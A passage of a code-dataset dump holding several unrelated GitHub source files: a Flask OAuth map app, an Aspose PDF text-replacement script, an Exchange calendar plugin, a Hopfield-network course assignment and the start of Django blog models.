api_base_url='https://www.recurse.com/api/v1/',\n authorize_url='https://www.recurse.com/oauth/authorize',\n access_token_url='https://www.recurse.com/oauth/token',\n client_id=getEnvVar('CLIENT_ID'),\n client_secret=getEnvVar('CLIENT_SECRET'),\n)\n\nconnection = psycopg2.connect(getEnvVar('DATABASE_URL'))\n\n\n@app.route('/')\ndef index():\n \"Get the single-page app HTML\"\n return send_from_directory('build', 'index.html')\n\n\n@app.route('/<path:path>')\ndef static_file(path):\n \"Get the single-page app assets\"\n return send_from_directory('build', path)\n\n\n@app.route('/auth/recurse')\ndef auth_recurse_redirect():\n \"Redirect to the Recurse Center OAuth2 endpoint\"\n callback = getEnvVar('CLIENT_CALLBACK')\n return rc.authorize_redirect(callback)\n\n\n@app.route('/auth/recurse/callback', methods=['GET', 'POST'])\ndef auth_recurse_callback():\n \"Process the results of a successful OAuth2 authentication\"\n\n try:\n token = rc.authorize_access_token()\n except HTTPException as e:\n logging.error(\n 'Error %s parsing OAuth2 response: %s',\n request.args.get('error', '(no error code)'),\n request.args.get('error_description', '(no error description'),\n )\n return (jsonify({\n 'message': 'Access Denied',\n 'error': request.args.get('error', '(no error code)'),\n 'error_description': request.args.get('error_description',\n '(no error description)'),\n }), 403)\n\n me = rc.get('profiles/me', token=token).json()\n logging.info(\"Logged in: %s\", me.get('name', ''))\n\n session['recurse_user_id'] = me['id']\n return redirect(url_for('index'))\n\n\ndef needs_authorization(route):\n \"\"\" Use the @needs_authorization annotation to check that a valid session\n exists for the current user.\"\"\"\n @wraps(route)\n def wrapped_route(*args, **kwargs):\n \"\"\"Check the session, or return access denied.\"\"\"\n if app.debug:\n return route(*args, **kwargs)\n elif 'recurse_user_id' in session:\n return route(*args, **kwargs)\n else:\n return (jsonify({\n 'message': 'Access Denied',\n }), 403)\n\n return wrapped_route\n\n\n@app.route('/api/geo.json')\n@needs_authorization\ndef get_locations():\n cursor = connection.cursor()\n cursor.execute(\"\"\"\n SELECT p.name AS name,\n p.image_url,\n p.directory_url,\n l.name AS location_name,\n l.longitude,\n l.latitude\n FROM profiles AS p\n INNER JOIN locations AS l\n on p.location = l.name\n ORDER BY p.profile_id ASC\n \"\"\")\n\n people = cursor.fetchall()\n cursor.close()\n\n return jsonify(\n geojson.FeatureCollection([\n geojson.Feature(\n geometry=geojson.Point((float(person[4]), float(person[5]))),\n properties={\n 'name': person[0],\n 'image_url': person[1],\n 'directory_url': person[2],\n 'location_name': person[3]\n },\n )\n for person in people\n ])\n )\n","repo_name":"jasonaowen/recurse-world","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12569853322","text":"import aspose.pdf as ap\n\ndocument = ap.Document(\"input2.pdf\")\n\n \n\n# Instantiate a TextFragmentAbsorber object\n\ntxtAbsorber = ap.text.TextFragmentAbsorber(\"Tengiz\")\n\n \n\n# Search text\n\ndocument.pages.accept(txtAbsorber)\n\n \n\n# Get reference to the found text fragments\n\ntextFragmentCollection = txtAbsorber.text_fragments\n\nfor frag in textFragmentCollection:\n\n print(frag.text)\n\n# Parse all the searched text fragments and replace text\n\nfor txtFragment in textFragmentCollection:\n\n txtFragment.text = \"that\"\n\n \n\n# Save the updated PDF\n\ndocument.save(\"output.pdf\")","repo_name":"Nikhilranjan7352/newdemo","sub_path":"myapps/pythonScripts/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"585058662","text":"\"\"\"\nExchange calendar integration.\n\"\"\"\n\nimport datetime as dt\nfrom collections import namedtuple\n\nfrom orgassist import log\nfrom orgassist.assistant import Assistant, AssistantPlugin\nfrom orgassist.config import ConfigError\n\nfrom orgassist.calendar import Event\nfrom orgassist.calendar import EventDate, DateType\n\nAttendee = namedtuple('Attendee', 'name, email, required')\n\n@Assistant.plugin('exch')\nclass ExchPlugin(AssistantPlugin):\n \"\"\"\n Exchange calendar integration. Reads events for today and in the given\n horizon and feeds them into the calendar core plugin.\n\n Will handle notifications and todays agenda display.\n \"\"\"\n\n def validate_config(self):\n \"Get all config values and test optional module existence.\"\n # Load optional modules only when module is configured.\n # Test here early that they exists.\n try:\n # pylint: disable=unused-variable\n from pyexchange import Exchange2010Service\n from pyexchange import ExchangeNTLMAuthConnection\n except ImportError:\n msg = (\"Exchange Plugin requires an optional pyexchange module. \"\n \"Install it with pip3 install pyexchange.\")\n raise ConfigError(msg)\n\n self.username = self.config.get('username', assert_type=str)\n self.password = self.config.get('password', assert_type=str)\n self.url = self.config.get('url', assert_type=str)\n self.ca_path = self.config.get_path('ca_path', required=False)\n\n self.horizon_incoming = self.config.get('horizon_incoming',\n default=24,\n assert_type=int)\n\n self.my_email = self.config.get('my_email', default='',\n assert_type=str)\n\n def register(self):\n \"Register commands\"\n commands = [\n (['exch.refresh'], self.handle_refresh),\n ]\n for aliases, callback in commands:\n self.assistant.command.register(aliases, callback)\n\n def initialize(self):\n \"\"\"\n Initialize connection and schedule periodic events.\n \"\"\"\n # Loading optional modules only when module is configured.\n from pyexchange import Exchange2010Service\n from pyexchange import ExchangeNTLMAuthConnection\n\n self.connection = ExchangeNTLMAuthConnection(url=self.url,\n username=self.username,\n password=self.password)\n self.service = Exchange2010Service(self.connection)\n self.exch_calendar = self.service.calendar()\n self.connection.build_session()\n\n if self.ca_path is not None:\n self.connection.session.verify = self.ca_path\n\n # Initial refresh\n self.refresh_events()\n self.scheduler.every(60 * 10).seconds.do(self.refresh_events)\n\n def handle_refresh(self, message):\n \"Handle force-refreshing and return stats on events\"\n events = self.refresh_events()\n reply = \"Read %d events from your calendar.\" % (len(events))\n message.respond(reply)\n\n def convert_event(self, exch_event):\n \"Convert Exchange event to orgassist calendar event\"\n # Drop external objects, gather all required data.\n # Don't leak abstraction.\n ctx = {\n 'subject': exch_event.subject,\n 'text_body': exch_event.text_body,\n 'location': exch_event.location,\n 'date_start': self.time.normalize(exch_event.start),\n 'date_end': self.time.normalize(exch_event.end),\n 'date_all_day': exch_event.is_all_day,\n\n 'organizer': Attendee(name=exch_event.organizer.name,\n email=exch_event.organizer.email,\n required=True) if exch_event.organizer else None,\n 'attendees': [\n Attendee(name=a.name,\n email=a.email,\n required=a.required)\n for a in exch_event.attendees\n if a is not None\n ],\n\n 'your_meeting': False,\n 'you_required': False,\n }\n\n # Safely determine organizer\n if ctx['organizer'] is None:\n ctx['organizer'] = Attendee(name='unknown',\n email='none',\n required=True)\n\n if ctx['organizer'].email == self.my_email:\n ctx['your_meeting'] = True\n\n myself = [\n a\n for a in ctx['attendees']\n if a.email == self.my_email\n ]\n\n if myself and myself[0].required:\n ctx['you_required'] = True\n\n # Context ready - construct our event\n parts = []\n if ctx['location']:\n parts.append('[' + ctx['location'] + ']')\n\n priority = 'C'\n if ctx['your_meeting']:\n parts.append('Your meeting')\n priority = 'A'\n elif ctx['you_required']:\n parts.append(\"Required by %s for\" % ctx['organizer'].name)\n priority = 'B'\n elif not ctx['you_required']:\n parts.append(\"Informed by %s about\" % ctx['organizer'].name)\n\n parts.append('\"' + ctx['subject'] + '\"')\n parts.append(\"(%d attending)\" % len(ctx['attendees']))\n\n headline = \" \".join(parts)\n\n event = Event(headline)\n event.priority = priority\n\n event.body = ctx['text_body']\n event.meta['exch'] = ctx\n\n date = EventDate((ctx['date_start'], ctx['date_end']),\n DateType.RANGE)\n event.add_date(date)\n\n return event\n\n def refresh_events(self):\n \"\"\"\n Read events from exchange, convert and update calendar.\n \"\"\"\n log.info(\"Periodic operation executed\")\n\n now = self.time.now()\n\n start_of_day = now.replace(hour=0, minute=0)\n horizon_end = now + dt.timedelta(hours=self.horizon_incoming)\n\n try:\n events = self.exch_calendar.list_events(\n start=start_of_day,\n end=horizon_end,\n details=True\n )\n except AttributeError:\n # Module is badly written. In case of connection errors it\n # throws Attribute Error. Show error in case something weird\n # happened, but don't kill bot.\n log.exception(\"Connection (probably) error within exch module.\")\n return None\n\n calendar_events = []\n for event in events.events:\n converted = self.convert_event(event)\n calendar_events.append(converted)\n\n log.info('Read %d events from exchange',\n len(calendar_events))\n\n # Use shared state to talk to core plugins\n self.state['calendar'].update_events(calendar_events, 'exch')\n return calendar_events\n","repo_name":"blaa/orgassist","sub_path":"orgassist/plugins/exch/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"} +{"seq_id":"4038348927","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 2 10:03:19 2021\n\n@author: cjrichier\n\"\"\"\n\n#import libraries\nimport random, math\nimport pandas as pd\n\n######## Initialize connection class ########\nclass Connection(object):\n def __init__(self, recipient, sender, weight = 0):\n self.owner = recipient #set connection to have the unit connect to another unit\n self.sender = sender #set who is sending the connection \n self.weight = weight #initialize the weight \n def update_weight(self): #update the weight of this connection \n #implementation of hopfield learning algorithim\n print('* * * * * * * * * * * * *')\n self.weight += (2 * self.owner.activation - 1) * (2 * self.sender.activation - 1)\n print('updated unit weight: ', self.weight)\n \n######## Initialize unit class ########\nclass HopUnit(object):\n def __init__(self, my_list, threshold=0):\n self.index = len(my_list) # give the unit an index \n self.threshold = threshold #set the threshold\n self.net_input = 0 #initialize net input to 0\n self.target_activation = 0\n self.connections = [] \n self.activation = 0 #initialize activation to 0 #create an argument for which activation function to use when initializing the neuron\n def add_connection(self, sender, weight=0):\n self.connections.append(Connection(self, sender, weight)) #create connections\n def update_input(self):\n self.net_input = 0\n for connection in self.connections:\n self.net_input += connection.weight * connection.sender.activation\n return self.net_input\n def update_target_activation(self):\n #most basic activation function\n \n if self.net_input > self.threshold:\n self.target_activation = 1\n else:\n self.target_activation = 0\n return self.net_input\n \n def display_value(self):\n if self.activation == self.target_activation:\n return ' '+str(self.activation)\n else:\n if self.activation == 1:\n return ' i'\n else:\n return ' o'\n \n def settled(self):\n if self.activation == self.target_activation:\n return True\n else:\n return False\n def update_activation(self): \n self.activation = self.target_activation\n def show(self):\n print('************************************')\n print ('\\nUnit '+str(self.index)+':')\n print ('\\tInput = '+str(self.net_input))\n print ('\\tTarget activation = '+str(self.target_activation))\n print ('\\tCurrent Activation = '+str(self.activation))\n print ('\\tHas connections from...')\n for connection in self.connections:\n print('\\t Unit '+str(connection.sender.index)+' = '+str(connection.weight))\n\n######## Initialize network class ########\nclass network(object):\n def __init__(self, num_units, default_threshold =0):\n self.units = []\n units = []\n for i in range(num_units):\n self.units.append(HopUnit(self.units, default_threshold))\n # and connect them\n for unit_i in self.units:\n for unit_j in self.units:\n if not unit_i is unit_j:\n unit_i.add_connection(unit_j)\n def all_units_have_settled(self):\n for unit in self.units:\n if unit.settled() == False:\n return False \n return True\n #This function is not working at all, gives an indexing error \n def make_starting_state(self, training_pattern, noise):\n #adds noise to training pattern to hand to network as starting state\n starting_state = []\n for i in range(len(training_pattern)):\n if random.random() < noise:\n #flip the number in training pattern \n if training_pattern[i] == 1:\n starting_state.append(0)\n else:\n starting_state.append(1) \n else:\n starting_state.append(training_pattern[i])\n return starting_state\n def train_patterns(self, training_pattern):\n #impose the training pattern on the network\n for i in range(len(training_pattern)):\n self.units[i].activation = training_pattern[i]\n print(self.units[i].activation)\n for unit in self.units:\n for connection in unit.connections:\n connection.update_weight()\n #return self\n def run_network(self, starting_state, training_pattern, sync_update=False):\n print('************************************')\n print('Running network with starting activation: ', str(starting_state))\n print('Trying to reconstruct: ', str(training_pattern))\n print('************************************')\n list_of_units_to_update = []\n for unit in self.units:\n list_of_units_to_update.append(unit) \n for i in range(len(starting_state)):\n self.units[i].activation = starting_state[i]\n iteration = 0\n all_done = False\n while not (all_done or iteration > 49):\n iteration += 1\n print('Iteration' , str(iteration), 'diagnostics and tracking:')\n ########################\n if sync_update == False:\n ########################\n for unit in self.units:\n #update net input and print details\n unit.update_input()\n unit.update_target_activation()\n #update target activations\n unit_TAs = []\n for unit in self.units:\n unit_TAs.append(unit.target_activation)\n #check for settling\n settled = self.all_units_have_settled()\n print('The network is settled? ', settled)\n print('Target activations: ', unit_TAs)\n if settled == False:\n #randomly choose one unit and update actual activation\n random_unit_to_update = random.choice(list_of_units_to_update)\n for unit in self.units:\n if unit.index == random_unit_to_update.index:\n unit.activation = unit.target_activation\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n print('unit randomly updated: ', random_unit_to_update.index)\n print('Updated activations: ', iteration_activation)\n iteration_energy = self.compute_energy()\n print('This iteration has energy ' + str(iteration_energy))\n print('************************************')\n elif settled == True:\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n all_done = True \n #######################\n if sync_update == True:\n #######################\n unit_start = []\n for unit in self.units:\n unit.update_input()\n unit_start.append(unit.update_input()) \n print(unit_start) \n for unit in self.units:\n unit.update_target_activation()\n #update net input and print details\n #inputs.append(unit.update_input())\n #print('updated input: ', inputs)\n #inputs = []\n #for unit in self.units:\n #inputs.append(unit.update_target_activation())\n #print('inputs as seen by target activations: ', inputs)\n #update activations\n for unit in self.units:\n unit.activation = unit.target_activation\n #check for settling\n \n settled = self.all_units_have_settled()\n print('The network is settled? ', settled)\n if settled == False:\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n print('Updated activations: ', iteration_activation)\n iteration_energy = self.compute_energy()\n print('This iteration has energy ' + str(iteration_energy))\n print('************************************')\n elif settled == True:\n iteration_activation = []\n for unit in self.units:\n iteration_activation.append(unit.activation)\n all_done = True \n \n final_activation = iteration_activation \n #now, calculate print some summary metrics\n #Keep track of the training state\n hamming_distance = self.hamming_distance(training_pattern, final_activation)\n energy = self.compute_energy()\n print('************************************')\n print('Training pattern to recover: ', str(training_pattern))\n print('Final network activation: ', str(final_activation))\n print('************************************')\n print('After running, the hamming distance between patterns this network ran on is ' + str(hamming_distance))\n if hamming_distance == 0:\n print('Congrats! The network rebuilt the pattern.')\n else:\n print('A bit off the mark there, bucko.')\n print('The energy of this network in its final iteration is ' + str(energy))\n if iteration > 20:\n print('This network failed to settle and ran for the maximum number of alloted iterations: ' + str(iteration))\n else:\n print('The Network ran for ' + str(iteration)+' iterations before it settled.')\n print('End of network run.')\n print('************************************')\n return(hamming_distance, energy, iteration)\n def compute_energy(self):\n # E = -1/2 (*sum (over weights, i,j, of a[i] *w[i,j]))\n energy = 0.0\n for unit in self.units:\n for connection in unit.connections:\n energy += connection.weight * connection.sender.activation * connection.owner.activation\n return -.5 * energy\n def hamming_distance(self, pattern1, pattern2):\n distance = 0\n for i in range(len(pattern1)):\n if pattern1[i] != pattern2[i]:\n distance +=1\n return distance\n\n####### Part 1 #######\n\n#initialize network\nHop_network = network(16) \n\n## part a)\n# Train the pattern on the walsh functions:\ntraining_pattern_1 = [1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0]\ntraining_pattern_2 = [1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0]\ntraining_pattern_3 = [1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,0]\ntraining_pattern_4 = [1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0]\nlist_of_training_patterns = [training_pattern_1, training_pattern_2, \n training_pattern_3, training_pattern_4]\n\n#Train the network on those walsh functions:\nHop_network.train_patterns(training_pattern_1) \nHop_network.train_patterns(training_pattern_2)\nHop_network.train_patterns(training_pattern_3)\nHop_network.train_patterns(training_pattern_4)\n\n#Part b)\n#run the network\nlist_0_runs = []\nlist_1_runs = []\nlist_2_runs = []\nlist_3_runs = []\nlist_4_runs = []\nlist_5_runs = []\nfor training_pattern in list_of_training_patterns:\n for noise_level in (0,.1,.2,.3,.4,.5): \n for run_index in range(5):\n start_pattern = Hop_network.make_starting_state(training_pattern, noise_level)\n #list_of_runs_output.append(Hop_network.run_network(start_pattern, training_pattern))\n if noise_level == 0:\n list_0_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .1:\n list_1_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .2:\n list_2_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .3:\n list_3_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .4:\n list_4_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif noise_level == .5:\n list_5_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n \n \n#Get summary statistics\n\nlist_0_runs = pd.DataFrame(list_0_runs)\nlist_1_runs = pd.DataFrame(list_1_runs)\nlist_2_runs = pd.DataFrame(list_2_runs)\nlist_3_runs = pd.DataFrame(list_3_runs)\nlist_4_runs = pd.DataFrame(list_4_runs)\nlist_5_runs = pd.DataFrame(list_5_runs)\n#############\nlist_0_runs = list_0_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_1_runs = list_1_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_2_runs = list_2_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_3_runs = list_3_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_4_runs = list_4_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_5_runs = list_5_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\npart_1b_summary_stats = [list_0_runs, list_1_runs, list_2_runs, \n list_3_runs ,list_4_runs, list_5_runs]\n\n#Print out the summary stats:\ncount = 0\nfor df in part_1b_summary_stats:\n print('* * * * * * * * * * * * * * * * * * * *')\n print('For noise value', str(count), ':')\n print('Number of times network failed to settle: ', df.loc[df['# Iterations'] == 50, '# Iterations'].count())\n print(\"Average energy: \", df['Energy'].mean())\n print(\"Average hamming Distance: \", df['Hamming Distance'].mean())\n count += .1\n\n'''The network , with increasing error values in the starting pattern, had growing \nhamming distance and times it failed to settle. The energy also increased with each increasing\nvalue of noise. In fact, when error is 0, it always can recreate the initial pattern.'''\n\n\n############ Part 2 ###########\n####### Random Patterns #######\n###############################\n\n#initialize network\nHop_network = network(16) \n\n#Part 2A\n#Create three random training patterns. In each training pattern activate each unit with probability 0.5.\nlist_of_random_training_patterns = []\nrandom_pattern_1 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_1.append(n)\nrandom_pattern_2 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_2.append(n)\nrandom_pattern_3 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_3.append(n)\nlist_of_random_training_patterns = [random_pattern_1, random_pattern_2, random_pattern_3]\n\n#Train the network on those walsh functions:\nHop_network.train_patterns(random_pattern_1) \nHop_network.train_patterns(random_pattern_2)\nHop_network.train_patterns(random_pattern_3)\n\n#Part 2B\n#Run the network\nlist_0_runs = []\nlist_1_runs = []\nlist_2_runs = []\nlist_3_runs = []\nlist_4_runs = []\nlist_5_runs = []\n\nfor noise_level in (0,.1,.2,.3,.4,.5): \n for training_pattern in list_of_random_training_patterns:\n for run_index in range(5):\n start_pattern = Hop_network.make_starting_state(training_pattern, noise_level)\n #list_of_runs_output.append(Hop_network.run_network(start_pattern, training_pattern))\n if training_pattern == random_pattern_1:\n list_0_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif training_pattern == random_pattern_2:\n list_1_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif training_pattern == random_pattern_3:\n list_2_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n \n\n#Get summary statistics\nlist_0_runs = pd.DataFrame(list_0_runs)\nlist_1_runs = pd.DataFrame(list_1_runs)\nlist_2_runs = pd.DataFrame(list_2_runs)\n\n#############\nlist_0_runs = list_0_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_1_runs = list_1_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_2_runs = list_2_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\npart_2b_summary_stats = [list_0_runs, list_1_runs, list_2_runs]\n\n#Print out the summary stats:\ncount = 0\nfor df in part_2b_summary_stats:\n print('* * * * * * * * * * * * * * * * * * * *')\n count += 1\n print('For random pattern', str(count), ':')\n print('Number of times network failed to settle: ', df.loc[df['# Iterations'] == 50, '# Iterations'].count())\n print(\"Average energy: \", df['Energy'].mean())\n print(\"Average hamming Distance: \", df['Hamming Distance'].mean())\n \n#How do the results differ from part 1?\n'''because the patterns have totally random noise, there is no systematic increase or \ndecrease in the different metrics of model performance'''\n\n#add more random starting patterns twice over:\nrandom_pattern_4 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_4.append(n)\n \n#now test the network with this new pattern:\n\nrandom_pattern_4_ss = Hop_network.make_starting_state(training_pattern, .2)\nHop_network.train_patterns(random_pattern_4)\nHop_network.run_network(random_pattern_4_ss, random_pattern_4)\n \nrandom_pattern_5 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_5.append(n)\n \n#now test the network with this new pattern:\nrandom_pattern_5_ss = Hop_network.make_starting_state(training_pattern, .2)\nHop_network.train_patterns(random_pattern_5)\nHop_network.run_network(random_pattern_5_ss, random_pattern_5)\n\n'''as you train more random patterns, the performance stays the same, more\nor less making noisy predictions about patterns that are randomly generated. \nThe energy also seems to increase, suggesting it falls into to some weird energy well.'''\n\n\n#################### Part 3 ###################\n####### Systematically Related Patterns #######\n###############################################\n\n#initialize network\nHop_network = network(16) \n\n#establish a base pattern and make noisy patterns based off it \nbase_pattern = [0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1]\npart3_tp1 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp2 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp3 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp4 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp5 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp6 = Hop_network.make_starting_state(base_pattern, .125)\n\nsystem_related_patterns = [part3_tp1, part3_tp2 ,part3_tp3,\n part3_tp4, part3_tp5 , part3_tp6]\n\n#Train the network on the noisy patterns we made, but NOT base pattern:\nHop_network.train_patterns(part3_tp1) \nHop_network.train_patterns(part3_tp2)\nHop_network.train_patterns(part3_tp3) \nHop_network.train_patterns(part3_tp4) \nHop_network.train_patterns(part3_tp5) \nHop_network.train_patterns(part3_tp6) \n\n\n\n#Now run the network using the nosiy start patterns with no change\n\npart_3_output = []\npart_3_output.append(Hop_network.run_network(part3_tp1, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp2, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp3, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp4, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp5, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp6, base_pattern))\n\n\n#Get summary statistics\npart_3_output = pd.DataFrame(part_3_output)\n#############\npart_3_output = part_3_output.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\n#Print out the summary stats:\nprint('* * * * * * * * * * * * * * * * * * * *')\nprint('Number of times network failed to settle: ', part_3_output.loc[df['# Iterations'] == 50, '# Iterations'].count())\nprint(\"Average energy: \", part_3_output['Energy'].mean())\nprint(\"Average hamming Distance: \", part_3_output['Hamming Distance'].mean())\n \n\n\n'''the network usually gets pretty close to rebuilding the base pattern, even\nthough it had never been shown it before. Hamming distances in the few times I tried running it\nwere either 0s or 1s. I'm really not sure what psychological \nphenomenon it might correspond to, but perhaps some sort of noise reduction? It can \nreconstruct a pattern it hadn't seen from many different instances of roughly that \nwith noise. Perhaps it might be some sort of associative memory retrieval?\n'''\n\n########## Part 4 ###########\n####### Sync updating #######\n#############################\n\nHop_network = network(16) \n\n\nHop_network.train_patterns(training_pattern_1) \nHop_network.train_patterns(training_pattern_2)\nHop_network.train_patterns(training_pattern_3)\nHop_network.train_patterns(training_pattern_4)\n\n\n#Run the network with asyncronous updating\nlist_0_runs = []\nlist_1_runs = []\nlist_2_runs = []\nlist_3_runs = []\nlist_4_runs = []\nlist_5_runs = []\nfor training_pattern in list_of_training_patterns:\n for noise_level in (0,.1,.2,.3,.4,.5): \n for run_index in range(5):\n start_pattern = Hop_network.make_starting_state(training_pattern, noise_level)\n \n if noise_level == 0:\n list_0_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .1:\n list_1_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .2:\n list_2_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .3:\n list_3_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .4:\n list_4_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .5:\n list_5_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n \n#Get summary statistics\nlist_0_runs = pd.DataFrame(list_0_runs)\nlist_1_runs = pd.DataFrame(list_1_runs)\nlist_2_runs = pd.DataFrame(list_2_runs)\nlist_3_runs = pd.DataFrame(list_3_runs)\nlist_4_runs = pd.DataFrame(list_4_runs)\nlist_5_runs = pd.DataFrame(list_5_runs)\n#############\nlist_0_runs = list_0_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_1_runs = list_1_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_2_runs = list_2_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_3_runs = list_3_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_4_runs = list_4_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_5_runs = list_5_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\npart_4_summary_stats = [list_0_runs, list_1_runs, list_2_runs, \n list_3_runs ,list_4_runs, list_5_runs]\n\n#Print out the summary stats:\ncount = 0\nfor df in part_4_summary_stats:\n print('* * * * * * * * * * * * * * * * * * * *')\n print('For noise value', str(count), ':')\n print('Number of times network failed to settle: ', df.loc[df['# Iterations'] == 50, '# Iterations'].count())\n print(\"Average energy: \", df['Energy'].mean())\n print(\"Average hamming Distance: \", df['Hamming Distance'].mean())\n count += .1\n\n","repo_name":"coreyjr2/PSYC-489---Neural-Net-Modeling","sub_path":"Psych 489 assignment 3.py","file_name":"Psych 489 assignment 3.py","file_ext":"py","file_size_in_byte":24075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28692927925","text":"from __future__ import annotations\nimport typing\n\nfrom django.conf import settings\nfrom django.db import models\nfrom django import forms\nfrom django.core.handlers.wsgi import WSGIRequest\nfrom rest_framework.request import Request\nfrom tinymce.models import HTMLField\n\nfrom sapp.models import SM, AbstractUser, ImageField\n\n\nclass Category(SM):\n icon = \"fas fa-ad\"\n list_field_names = (\"id\", \"name\", \"image\")\n serializer_list_field_names = list_field_names + (\"header\", )\n detail_field_names = (\"id\", \"name\", \"image\", \"header\") + SM.sm_meta_field_names\n api_methods = (\"get_category_post_stats_api\", \"get_category_author_stats_api\")\n queryset_names = (\"posts\",)\n\n class Meta(SM.Meta):\n verbose_name_plural = \"Categories\"\n\n name = models.CharField(max_length=256)\n image = ImageField(upload_to=\"blog_posts\")\n header = models.TextField(blank=True, null=True, max_length=256)\n\n @property\n def posts(self):\n return Post.objects.filter(category = self)\n \n @classmethod\n def get_category_post_stats_api(cls, request: Request, kwds: dict):\n return cls.get_category_post_stats()\n\n @classmethod\n def get_category_post_stats(cls):\n data = {}\n for i in Category.objects.all():\n data[f\"{i.name}\"] = Post.objects.filter(category_id=i.pk).count()\n return data\n \n @classmethod\n def get_category_author_stats_api(cls, request: Request, kwds: dict):\n return cls.get_category_author_stats()\n\n @classmethod\n def get_category_author_stats(cls):\n data = {}\n for i in Category.objects.all():\n data[f\"{i.name}\"] = Author.objects.filter(categories__in=[i]).count()\n return data\n \n def __str__(self):\n return self.name\n\n\nclass Author(SM):\n icon = \"fas fa-user-tie\"\n list_field_names = (\"id\", \"user\", \"image\", \"full_name\")\n queryset_names = (\"posts\", )\n api_methods = (\"get_author_ctx_api\", )\n\n user: models.OneToOneField[AbstractUser] = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True)\n full_name = models.CharField(max_length=256)\n image = ImageField(upload_to=\"blog_authors\", blank=True, null=True)\n about = HTMLField()\n categories = models.ManyToManyField(Category, blank=True)\n\n def __str__(self):\n return self.full_name\n\n @property\n def posts(self):\n return Post.objects.filter(author = self)\n \n @classmethod\n def get_author_ctx_api(cls, request: Request, kwds: dict):\n author = Author.objects.filter(user=request.user).first()\n if not author:\n return None\n serializer_class = cls.get_serializer(request, (\"id\", \"full_name\", \"user\", \"image\", \"about\", \"categories\"))\n return serializer_class(instance=author).data\n\n\nclass Post(SM):\n icon = \"fas fa-blog\"\n list_field_names = (\"id\", \"title\", \"image\", \"category\", \"author\", \"published\", \"reads\", \"creation_timestamp\")\n serializer_list_field_names = list_field_names + (\"serialized_author\", \"serialized_category\")\n detail_field_names = list_field_names + (\"body\", \"keywords\") + SM.sm_meta_field_names\n serializer_detail_field_names = tuple(set(serializer_list_field_names+ detail_field_names))\n filter_field_names = 